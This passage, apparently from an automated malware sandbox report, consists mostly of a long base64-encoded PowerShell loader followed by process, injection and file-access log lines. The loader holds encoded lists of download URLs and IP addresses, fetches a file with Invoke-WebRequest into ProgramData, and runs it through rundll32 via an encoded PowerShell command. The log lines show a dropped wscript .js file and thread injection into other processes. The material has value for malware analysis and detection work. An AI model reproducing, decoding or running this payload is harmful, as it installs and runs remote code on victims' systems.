AEEARwBZAEEAWQBRAEIAcABBAEcAdwBBAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABFAEEATgB3AEEAdQBBAEQASQBBAE0AZwBBAHgAQQBDADQAQQBPAEEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAVQBBAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEAMQBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQA1AEEARABJAEEATABnAEEAeABBAEQARQBBAE8AUQBBAD0AIgA7ACQAVQBuAGMAbwBuAHQAZQBtAHAAbABhAHQAaQB2AGUAbgBlAHMAcwBEAGUAYwBhAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABjAGwAYQB5AG8AcQB1AG8AdABYAGkAcABoAG8AcwB1AHIAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFUAbgBjAG8AbgB0AGUAbQBwAGwAYQB0AGkAdgBlAG4AZQBzAHMARABlAGMAYQBkAGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABhAG0AaQBuAGEAdABpAG8AbgAuAHUAbgBuAGEAaQB2AGUAbAB5ADsAJABQAG8AbAB5AHIAaAB5AHQAaABtAGkAYwBhAGwAbAB5AFMAdQBwAGUAcgBjAGEAcAB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBVAEEASABJAEEAWQBRAEIAdABBAEcAVQBBAGIAQQBCAHMAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQBPAHQAUwBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQwBBAEcAOABBAGIAZwBCAGwAQQBHAEUAQQBZAHcAQgBvAEEARwBVAEEATABnAEIAegBBAEgAUQBBAE8AdABTAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATQB3AEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AdwBBAD0ATwB0AFMAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAMQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQAzAEEARABZAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABhAG0AaQBuAGEAdABpAG8AbgAuAHUAbgBuAGEAaQB2AGUAbAB5ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA1ADMAOQA5ADMAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAHcAQQBZAFEAQgB0AEEARwBrAEEAYgBnAEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBMAGcAQgAxAEEARwA0AEEAYgBnAEIAaABBAEcAawBBAGQAZwBCAGwAQQBHAHcAQQBlAFEAQQBzAEEASABZAEEAYQBRAEIAdwBBAEgATQBBAE8AdwBCAE4AQQBFAGsAQQBWAEEAQgBNAEEARwBrAEEAWQB3AEIAbABBAEcANABBAGMAdwBCAGwAQQBBAD0APQAiADsAJABFAG4AcwBpAGUAbgB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQB3AEEANQBBAEMANABBAE0AUQBBAHcAQQBEAGMAQQBMAGcAQQB4AEEARABVAEEATwBBAEEAdQBBAEQASQBBAE0AUQBBADIAQQBBAD0APQB6AFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABRAEEAYQBBAEIAMQBBAEcAMABBAFkAZwBCAGwAQQBIAEkAQQBVAEEAQgA1AEEASABJAEEAYgB3AEIANABBAEgAawBBAGIAQQBCAGwAQQBDADQAQQBZAHcAQgB1AEEAQQA9AD0AegBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAawBBAFkAUQBCADYAQQBHAGsAQQBiAGcAQgBsAEEAQwA0AEEAWgB3AEIAeQBBAEcARQBBAGMAQQBCAG8AQQBHAGsAQQBZAHcAQgB6AEEAQQA9AD0AegBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AQQBBADAAQQBDADQAQQBNAFEAQQAwAEEARABBAEEATABnAEEAeABBAEQATQBBAE0AZwBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQQA9AD0AIgA7ACQAdgBpAGEAYgBpAGwAaQB0AGkAZQBzAEQAZQBuAHMAaABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAEEAQQA1AEEAQwA0AEEATQBRAEEAMgBBAEQAVQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABnAEEATQBBAEEAPQBJAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAYgBBAEIAcABBAEcANABBAGEAdwBCAHAAQQBHAFUAQQBjAGcAQQB1AEEARwBZAEEAZQBRAEIAcABBAEEAPQA9AEkAYgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBHADQAQQBhAEEAQgBsAEEASABJAEEAYQBRAEIAMABBAEcARQBBAGIAZwBCAGoAQQBHAFUAQQBMAGcAQgBqAEEARwA0AEEASQBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE0AUQBBAHUAQQBEAEUAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAFEAQQA9ACIAOwAkAFQAbwByAG4AYQBkAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAEEAQQBOAFEAQQB1AEEARABFAEEATgBBAEEAeABBAEEAPQA9AGYAZgBEAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGIAdwBCAHoAQQBIAFEAQQBaAFEAQgB5AEEARwBrAEEAYgB3AEIAeQBBAEcAawBBAFQAUQBCADUAQQBIAFEAQQBhAEEAQgB2AEEASABBAEEAYgB3AEIAbABBAEgAUQBBAGEAUQBCADYAQQBHAFUAQQBMAGcAQgBqAEEARwB3AEEAZABRAEIAaQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7ACQAQQB1AGMAdABvAHIAaQBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBOAEEAQQB1AEEARABFAEEATwBBAEEANABBAEEAPQA9AD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB6AEEASABRAEEAYQBRAEIAagBBAEgAVQBBAGIAQQBCAGgAQQBHAE0AQQBhAFEAQgB2AEEASABVAEEAYwB3AEEAdQBBAEcAMABBAGIAdwBCAHkAQQBIAFEAQQBaAHcAQgBoAEEARwBjAEEAWgBRAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwB3AEEAYQBRAEIAMABBAEgAYwBBAGIAdwBCAHkAQQBHAHMAQQBMAGcAQgB0AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAGQAQQBCAHAAQQBHADQAQQBaAHcAQQA9AD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAE0AQQBMAGcAQQB4AEEARABRAEEATgBRAEEAdQBBAEQASQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAIgA7ACQAZQBlAHIAbwBjAGsAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAMwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATgBRAEEAPQBsAGEAZQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBAHoAQQBEAFkAQQBsAGEAZQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARwBBAEcARQBBAGEAUQBCADAAQQBHAGcAQQBkAHcAQgB2AEEASABJAEEAZABBAEIAbwBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBGAEEASABVAEEAWQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHAEUAQQBkAEEAQgBwAEEARwA0AEEATABnAEIANgBBAEcAOABBAGIAZwBCAGwAQQBBAD0APQAiADsAJABuAGUAbwB0AGUAcgBpAGMAYQBsAGwAeQBQAHIAbwBiAGwAZQBtAGEAdABpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASwBBAEcARQBBAFkAdwBCAGgAQQBIAEkAQQBZAFEAQgB1AEEARwBRAEEAWQBRAEEAdQBBAEcASQBBAGEAUQBCAHYAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAVQBBAGMAdwBCAHAAQQBHAE0AQQBZAFEAQgBzAEEARwB3AEEAZQBRAEEAdQBBAEcAawBBAGIAUQBBAD0ATwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBPAEEAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAVQBBAE4AQQBBAHUAQQBEAEkAQQBOAEEAQQA0AEEAQQA9AD0AIgA7AH0AfQAkAG8AdAB0AG8AbQBhAG4AbABpAGsAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAZwBBAGUAUQBCAHoAQQBHAGsAQQBjAFEAQgAxAEEARwBVAEEATABnAEIAMgBBAEcAVQBBAFoAdwBCAGgAQQBIAE0AQQAiADsAJABTAHAAbABpAGMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEASABVAEEAYgBRAEIAcABBAEcANABBAFkAUQBCAHMAQQBDADQAQQBjAHcAQgBoAEEARwB3AEEAWgBRAEEAPQBvAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEARwBVAEEAYgBnAEIAaABBAEcANABBAFkAdwBCAGwAQQBIAEkAQQBVAHcAQgBsAEEASABBAEEAZABRAEIAcwBBAEgAUQBBAEwAZwBCAG4AQQBHADAAQQBZAGcAQgBvAEEAQQA9AD0AbwBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAFkAUQBCAHoAQQBIAEEAQQBhAFEAQgB6AEEARwBnAEEAYgBBAEIANQBBAEUATQBBAGEAQQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEARwBrAEEAWQBRAEIAdQBBAEcAOABBAFoAdwBCAGwAQQBHADQAQQBkAEEAQgBwAEEARwB3AEEAYQBRAEIAegBBAEcAMABBAEwAZwBCAGgAQQBIAEkAQQBiAFEAQgA1AEEAQQA9AD0AbwBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGQAUQBCAHMAQQBHADAAQQBiAHcAQgB1AEEARwBVAEEAWQB3AEIAMABBAEcAOABBAGIAUQBCADUAQQBGAFUAQQBiAGcAQgB6AEEASABrAEEAYgBRAEIAaQBBAEcAOABBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAbwBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBiAFEAQgBoAEEASABNAEEAIgA7ACQAVwBvAHIAcgBpAGMAbwB3ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgBBAEIAdgBBAEgASQBBAGEAUQBCAGsAQQBHAFUAQQBZAFEAQgB1AEEAQwA0AEEAYgBBAEIAdgBBAEcARQBBAGIAZwBBAD0AIgA7AA=="
parent_process wscript.exe martian_process wscript "C:\ProgramData\ConvenerCushaw.js" Deforces Unextorted Unfaceted Lophotriaene
parent_process wscript.exe martian_process "C:\Windows\System32\wscript.exe" "C:\ProgramData\ConvenerCushaw.js" Deforces Unextorted Unfaceted Lophotriaene
Process injection Process 1636 resumed a thread in remote process 2504
Process injection Process 2504 resumed a thread in remote process 236
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000340
suspend_count: 1
process_identifier: 2504
1 0 0

NtResumeThread

 thread_handle: 0x0000033c
suspend_count: 1
process_identifier: 236
1 0 0
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe